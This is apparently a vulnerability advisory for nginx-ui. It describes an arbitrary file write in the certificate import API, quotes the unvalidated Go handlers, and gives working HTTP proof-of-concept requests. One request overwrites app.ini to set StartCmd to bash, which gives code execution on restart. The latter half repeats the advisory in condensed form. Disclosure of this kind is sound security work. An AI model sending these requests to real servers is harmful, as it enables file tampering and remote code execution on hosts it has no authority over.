Summary
The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system.
https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/api/certificate/certificate.go#L72
func AddCert(c *gin.Context) {
var json struct {
Name string `json:"name"`
SSLCertificatePath string `json:"ssl_certificate_path" binding:"required"`
SSLCertificateKeyPath string `json:"ssl_certificate_key_path" binding:"required"`
SSLCertificate string `json:"ssl_certificate"`
SSLCertificateKey string `json:"ssl_certificate_key"`
ChallengeMethod string `json:"challenge_method"`
DnsCredentialID int `json:"dns_credential_id"`
}
if !api.BindAndValid(c, &json) {
return
}
certModel := &model.Cert{
Name: json.Name,
SSLCertificatePath: json.SSLCertificatePath,
SSLCertificateKeyPath: json.SSLCertificateKeyPath,
ChallengeMethod: json.ChallengeMethod,
DnsCredentialID: json.DnsCredentialID,
}
err := certModel.Insert()
if err != nil {
api.ErrHandler(c, err)
return
}
content := &cert.Content{
SSLCertificatePath: json.SSLCertificatePath,
SSLCertificateKeyPath: json.SSLCertificateKeyPath,
SSLCertificate: json.SSLCertificate,
SSLCertificateKey: json.SSLCertificateKey,
}
err = content.WriteFile()
if err != nil {
api.ErrHandler(c, err)
return
}
c.JSON(http.StatusOK, Transformer(certModel))
}
https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/internal/cert/write_file.go#L15
func (c *Content) WriteFile() (err error) {
// MkdirAll creates a directory named path, along with any necessary parents,
// and returns nil, or else returns an error.
// The permission bits perm (before umask) are used for all directories that MkdirAll creates.
// If path is already a directory, MkdirAll does nothing and returns nil.
err = os.MkdirAll(filepath.Dir(c.SSLCertificatePath), 0644)
if err != nil {
return
}
err = os.MkdirAll(filepath.Dir(c.SSLCertificateKeyPath), 0644)
if err != nil {
return
}
if c.SSLCertificate != "" {
err = os.WriteFile(c.SSLCertificatePath, []byte(c.SSLCertificate), 0644)
if err != nil {
return
}
}
if c.SSLCertificateKey != "" {
err = os.WriteFile(c.SSLCertificateKeyPath, []byte(c.SSLCertificateKey), 0644)
if err != nil {
return
}
}
return
}
PoC
POST /api/cert HTTP/1.1
Host: 127.0.0.1:9000
Content-Length: 144
Accept: application/json, text/plain, */*
Authorization: <JWT>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,fr;q=0.7
Connection: close
{"name":"poc","ssl_certificate_path":"/tmp/test","ssl_certificate_key_path":"/tmp/test2","ssl_certificate":"test","ssl_certificate_key":"test2"}
root@aze:~/nginx# ls -la /tmp/test*
-rw-r--r-- 1 root root 4 Jan 24 13:33 /tmp/test
-rw-r--r-- 1 root root 5 Jan 24 13:33 /tmp/test2
It's possible to leverage it into an RCE in a senario by overwriting the config file app.ini - But it will require the app.
root@aze:~/nginx# cat app.ini | grep "StartCmd"
StartCmd = login
Then we overwrite the StartCmd
with bash
POST /api/cert HTTP/1.1
Host: 127.0.0.1:9000
Content-Length: 980
Accept: application/json, text/plain, */*
Authorization: <JWT>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,fr;q=0.7
Connection: close
{"name":"poc","ssl_certificate_path":"/root/nginx/app.ini","ssl_certificate_key_path":"/tmp/test2","ssl_certificate":"[server]\r\nHttpHost = 0.0.0.0\r\nHttpPort = 9000\r\nRunMode = debug\r\nJwtSecret = 504f334b-ac68-4fbc-9160-2ecbf9e5794c\r\nNodeSecret = 139ab224-9e9e-444f-987e-b3a651175ad5\r\nHTTPChallengePort = 9180\r\nEmail = [email protected]\r\nDatabase = database\r\nStartCmd = bash\r\nCADir = dqsdqsd\r\nDemo = false\r\nPageSize = 10\r\nGithubProxy = dqsdqfsdfsdfsdfsd\r\n\r\n[nginx]\r\nAccessLogPath =\r\nErrorLogPath =\r\nConfigDir =\r\nPIDPath =\r\nTestConfigCmd =\r\nReloadCmd =\r\nRestartCmd =\r\n\r\n[openai]\r\nBaseUrl = \r\nToken =\r\nProxy =\r\nModel = \r\n\r\n[casdoor]\r\nEndpoint =\r\nClientId =\r\nClientSecret =\r\nCertificate =\r\nOrganization =\r\nApplication =\r\nRedirectUri =","ssl_certificate_key":"test2"}
root@aze:~/nginx# cat app.ini | grep "StartCmd"
StartCmd = bash
For the new config to be applied the app needs to be restarted
Impact
Arbitrary write/overwrite into the host file system with a risk of remote code execution if the app restarts.
References
Summary
The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system.
https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/api/certificate/certificate.go#L72
https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/internal/cert/write_file.go#L15
PoC
It's possible to leverage it into an RCE in a senario by overwriting the config file app.ini - But it will require the app.
Then we overwrite the
StartCmd
withbash
For the new config to be applied the app needs to be restarted
Impact
Arbitrary write/overwrite into the host file system with a risk of remote code execution if the app restarts.
References